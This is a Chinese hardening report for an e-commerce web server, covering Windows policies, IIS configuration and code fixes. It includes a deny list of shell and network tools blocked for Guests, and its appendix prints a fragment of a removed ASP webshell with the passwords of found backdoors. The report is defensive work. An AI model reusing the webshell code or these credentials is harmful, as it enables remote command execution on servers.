某电子商务网站安全加固报告Word文档下载推荐.docx

上传人:b****4 文档编号:16945720 上传时间:2022-11-27 格式:DOCX 页数:20 大小:21.65KB
下载 相关 举报
某电子商务网站安全加固报告Word文档下载推荐.docx_第1页
第1页 / 共20页
某电子商务网站安全加固报告Word文档下载推荐.docx_第2页
第2页 / 共20页
某电子商务网站安全加固报告Word文档下载推荐.docx_第3页
第3页 / 共20页
某电子商务网站安全加固报告Word文档下载推荐.docx_第4页
第4页 / 共20页
某电子商务网站安全加固报告Word文档下载推荐.docx_第5页
第5页 / 共20页
点击查看更多>>
下载资源
资源描述

某电子商务网站安全加固报告Word文档下载推荐.docx

《某电子商务网站安全加固报告Word文档下载推荐.docx》由会员分享,可在线阅读,更多相关《某电子商务网站安全加固报告Word文档下载推荐.docx(20页珍藏版)》请在冰豆网上搜索。

某电子商务网站安全加固报告Word文档下载推荐.docx

0字符

密码最长存留期

42天

密码最短存留期

0天

帐号锁定计数器

帐户锁定时间

帐户锁定阀值

7字符

90天

30天

5次

5分钟

1分钟

保障帐号以及口令的安全

设置帐号策略后可能导致不符合帐号策略的帐号无法登陆,需修改帐号密码(注:

管理员不受帐号策略限制,但管理员密码应复杂)

2.1.3网络与服务加固

Windows-04003,Windows-04004

卸载不需要的服务

已安装的不必要的服务包括:

DNS服务

DHCP服务

MSFTP服务

SNMP服务

开始|设置|控制面板|添加/删除程序|Windows组件

避免未知漏洞给主机带来的风险

可能由于管理员对主机所开放服务不了解,导致该服务被卸载。

Windows-04005

将暂时不需要开放的服务停止

已启动且需要停止的服务包括:

ComputerBrowser服务

Alerter服务

Messenger服务

开始|运行|services.msc|将上述服务的启动类型设置为手动并停止上述服务

2.1.4文件系统加固

Windows-05002

限制特定执行文件的权限

未对敏感执行文件设置合适的权限

通过实施我公司的安全策略文件对特定文件权限进行限制,禁止Guests用户组访问这些文件。

禁止Guests用户组访问以下文件:

xcopy.exe

wscript.exe

cscript.exe

net.exe

arp.exe

edlin.exe

ping.exe

route.exe

posix.exe

Rsh.exe

atsvc.exe

Copy.exe

cacls.exe

ipconfig.exe

rcp.exe

cmd.exe

debug.exe

regedt32.exe

regedit.exe

telnet.exe

Finger.exe

Nslookup.exe

Rexec.exe

ftp.exe

at.exe

runonce.exe

nbtstat.exe

Tracert.exe

netstat.exe

在极少数情况下,某些网页可能调用cmd.exe来完成某种功能,限制cmd.exe的执行权限可能导致调用cmd失败。

2.1.5日志审核增强

Windows-06001

设置主机审核策略

审核策略更改

无审核

审核登录事件

审核对象访问

审核过程追踪

审核目录服务访问

审核特权使用

审核系统事件

审核帐户登录事件

审核帐户管理

通过实施我公司的安全策略文件修改下述值:

成功

成功,失败

对系统事件进行审核,在日后出现故障时用于排查故障。

Windows-06002,Windows-06003,Windows-06004

调整事件日志的大小、覆盖策略

大小

覆盖方式

应用日志

512K

覆盖早于7天的事件

安全日志

系统日志

16382K

覆盖早于30天的事件

16384K

增大日志大小,避免由于日志文件容量过小导致日志记录不全

2.1.6安全性增强

Windows-07001

禁止匿名用户连接

Key:

HKLM\SYSTEM\CurrentControlSet\Control\Lsa

“restrictanonymous”的值为0

通过实施我公司的安全策略文件将该值修改为“1”

可以禁止匿名用户列举主机上所有用户、组、共享资源

Windows-04006

删除主机管理共享

HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters

无“Autoshareserver”键

通过实施我公司的安全策略文件增加“Autoshareserver”项,并设置该值为“1”

删除主机因为管理而开放的共享

某些应用软件可能需要该共享,如VeritasNetbackup

Windows-03005

限制Guest用户权限

Guest已禁用,但未对帐号进行权限限制。

通过实施我公司的安全策略文件禁止Guest帐号本地登录和网络登录的权限。

避免Guest帐号被黑客激活作为后门

2.1.7推荐安装安全工具

工具名称

IceSword1.06

工具用途

特洛伊木马彻查、黑客后门检测工具

相关信息

X-Scan-v3.2-cn

网络隐患扫描工具

注:

工具名称请包含版本信息

工具用途请简单描述产品功用

相关信息请写明产品相关URL,尽量详细

2.2IIS服务加固

2.2.1补丁安装

Windows-02001(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)

(应描述实施本条措施所导致的后果)

2.2.2网站实例权限分配

Windows-02002(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)

权限分配

没有对每个网站实例进行相应的权限分配,任何一个网站被入侵后都有可能导致其他网站被入侵

每个网站实例都对应使用低权限帐户,并去除网站后台的匿名访问,集成Windows认证

可以使各个网站实例读取、修改权限完全分开,避免入侵者从一个网站实例入侵到另一个网站实例

2.2.3IIS配置安全增强

Windows-02003(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)

配置安全增强

存在很多默认配置,导致入侵者可利用

修正IIS的扩展配置,减少asp.dll解析范围,禁止下载MDB文件

减少入侵者入侵几率,防止网站数据库被恶意下载

2.2.4安全控件加固

Windows-02004(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)

安全空间加固

存在很多危险控件,导致入侵者可利用

卸载了WSH控件,修改Shell.Application控件的名称,防止入侵者利用:

HKEY_CLASSES_ROOT\Shell.Application改成Shell.Application_OurSafe

HKEY_CLASSES_ROOT\Shell.Application.1改成了Shell.Application.1_OurSafe

减少ASP木马对网站的威胁

将有可能导致某些特殊网站实例不能正常运行

2.3代码审核加固

2.3.1清除WebShell代码

Windows-03001(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)

清除WebShell代码

有可能存在入侵者留下的后门、WebShell程序

人工搜索查找入侵者留下的后门ASP程序

防止入侵者再次入侵网站

2.3.2清除SQL注入漏洞

Windows-03002(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)

清除SQL注入漏洞

存在很多SQL注入漏洞

使用统一脚本,对用户提交进行过滤检查,防止用户提交注入代码

防止恶意用户利用SQL注入漏洞危害网站

2.3.3修正权限认证缺陷

Windows-03003(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)

修正权限认证缺陷

存在一部份的权限未认证缺陷

对没有检查权限的页面添加权限认证

防止低权限用户执行高权限功能

2.3.4减少上传风险威胁

Windows-03004(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)

存在上传漏洞

修改代码封堵上传漏洞

防止恶意用户上传WebShell或其他恶意程序

2.3.5正确处理数据库文件

Windows-03005(将所有涉及到这个加固项的检测文档编号填写,如有多个,用逗号分开,写文档的时候将本文字删除)

正确处理数据库文件

采用ASP为扩展名,恶意用户将有可能插入恶意代码并执行

扩展名改为MDB,并对WEB应用程序进行相应修改

防止恶意用户插入恶意代码并执行

三、推荐安全注意事项

3.1为新增网站实例分配权限

当需要新增加一个网站实例的时候,需要按照一定的步骤完成权限的分配:

1.新建两个帐号,删除这两个帐号的User组身份,加入Guest组;

2.指定网站目录只能够被XXXistrator和SYSTEM完全控制,而上述两个帐号对该目录及其子目录有读写、修改权限;

3.在IIS中设置匿名访问该网站的匿名帐户为上述两个帐号其中之一;

4.在IIS中设置该网站管理员后台目录(或核心文件)不允许匿名访问,增加Windows身份认证;

5.在IIS中设置该网站的主机头。

3.2使用SSL加密FTP传输

开启Serv-U的SSL加密功能,只允许加密登陆以及加密传输文件,以防止恶意用户ARP嗅探FTP密码。

3.3加强管理员安全习惯

注意及时升级管理员主机的系统补丁和杀毒软件病毒库,定期使用推荐的后门检测工具对主机进行安全检测。

定期更换Web应用程序后台管理员密码,并保证密码的强度。

四、签字确认

双方认可加固报告,签字确认。

甲方:

乙方:

签字(签章):

签字(签章)

日期:

日期

附录:

后台访问用户认证分配一览表

域名

目录指向

后台登陆用户名

XX.com

D:

\WEB\XXX\

XXX.XX

XX.net

\

XX.XX

XX.cn

\www1

XX.XX

\WEB\XX.com\

\WEB\XX.com

bbs.XX.com

\WEB\XXX\bbs

XX.XXX.XX

XX.XX.com

\WEB\XXX\XXX

XX.XXX.XXX

\WEB\XXX\exam

XX.XXX.XX

用户密码暂统一为“****”(不带双引号),建议用户自行修改。

代码加固修改一览表

XXX.com目录

Connection.asp

修改数据库为mdb结尾

修改包含sql.asp,防止SQL注入

Include\RegKey.cfg

修改数据库结尾

Setup.asp

改名为Setup04131.asp

\Manger\Editor7183409

改为Editor7183401

Include\const.asp

删除!

webshell

Include\MD5.asp

删掉文件最后一行,该行代码为webshell代码

CONN.ASP

增加容错信息

XXX/CONN.ASP

XXX/UP

注释掉27行,替换成固定上传路径为"

"

../pic/"

的代码

增加对XXX身份验证,<

!

--#includefile="

./inc/head.asp"

-->

XXX/UPLOAD.ASP

XXX/TEXTBOX.ASP

XXX/EOKEDIT.ASP

eWebEditor

目录名改为eWebEditor41937

editdel.asp

修改增加身份验证

chkXXX.asp

修改认证方式,采用session保存密码,防止跨站攻击

test

目录名修改为Test8322

XXX\XXX.ASP

将管理身份认证提前

添加容错信息

XXX\data.mdb

防止下载,改名为data3415.mdb

XXX\inc\ubb.asp

删掉!

WebShell代码

kjask\common.asp

修改数据库为kjgb5674.mdb

XX\XXX_backup.asp

WebShell,密码是6568168

XX\dragon.asp

WebShell

XX\LOGIN.ASP

删除最后三行,WebShell代码

<

了>

objectid=fsRUNAT=SERVERclassid='

clsid:

0D43FE01-F093-11CF-8940-00A0C9054228'

>

/object>

%ifrequest("

kker"

)<

4136705"

thenSession("

b"

)=request("

ifSession("

thenexecuteSession("

)%>

XX\XXX\TEST.ASP

空文件

XX\XXX\testab.asp

删除,WebShell,密码是!

@#123

XX\tiet.asp

XX\userad.asp

XX\20.asp

AD/qidong

未知快捷方式

XX/UP

XX/UPLOAD.ASP

XX/TEXTBOX.ASP

XX/EOKEDIT.ASP

防止下载,改名为data1332.mdb

XXX\BKCONN.ASP

XXX\INCLUDE\BKCONN.ASP

XXX\XXX\addpicture.asp

源文件以被破坏,无法修正该源文件

XXX\XXX\LOGIN.ASP

改正登陆时对用户名输入的合法性验证

XXX\XXX\broadcast.asp

增加管理身份认证

XXX\XXX\guestbookmod.asp

XXX\XXX\guestbook.asp

XXX\savefaqdel.asp

XXX\XXX\saveguestbookdel.asp

XXX\XXX\saveguestbookmod.asp

exam\login.asp

注释掉6到12行代码,怀疑为后门代码

exam\conn.asp

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 外语学习 > 其它语言学习

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1